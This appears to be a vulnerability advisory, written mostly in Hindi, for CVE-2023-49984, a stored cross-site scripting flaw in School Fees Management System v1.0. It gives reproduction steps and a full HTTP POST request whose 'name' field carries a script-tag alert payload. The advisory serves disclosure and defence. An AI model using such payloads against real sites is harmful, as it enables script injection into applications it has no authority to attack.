
स्कूल फीस प्रबंधन प्रणाली v1.0 - क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी में 'name' फील्ड/पैरामीटर पर '/management/settings'
विवरण: School Fees Management System v1.0 के "/management/settings" घटक में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी हमलावरों को name पैरामीटर में इंजेक्ट किए गए एक क्राफ्टेड पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।
कमजोर उत्पाद संस्करण: School Fees Management System v1.0
CVE लेखक: Geraldo Alcântara
तिथि: 28/11/2023
पुष्टि की तिथि: 19/12/2023
CVE: CVE-2023-49984
परीक्षण किया गया: Windows
कमजोरी का शोषण करने के लिए, उपयुक्त अनुमतियों वाले उपयोगकर्ता को "/ci_fms/admin/management/settings" पृष्ठ तक पहुँचना होगा। इस पृष्ठ पर, उपयोगकर्ता को सामान्य सेटिंग्स में फ़ील्ड्स को संपादित करना चाहिए। दुर्भावनापूर्ण पेलोड को "name" या "phone" या "address" या "bank" या "acc_name" या "acc_number" में डाला जाना चाहिए।
POST /ci_fms/admin/action/main_settings HTTP/1.1
Host: 192.168.68.148
Content-Length: 209
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/settings
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=qvpbijnrhr1a3stolsuvdglpo8a7mb3h
Connection: close
name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&phone=09123456987&address=14+Street%2C+There+City%2C+Anywhere%2C+2306&bank=ABC+Bank&acc_name=Our+Best+School&acc_number=123456789874&session=2022-2023
खोजकर्ता/श्रेय:
Geraldo Alcântara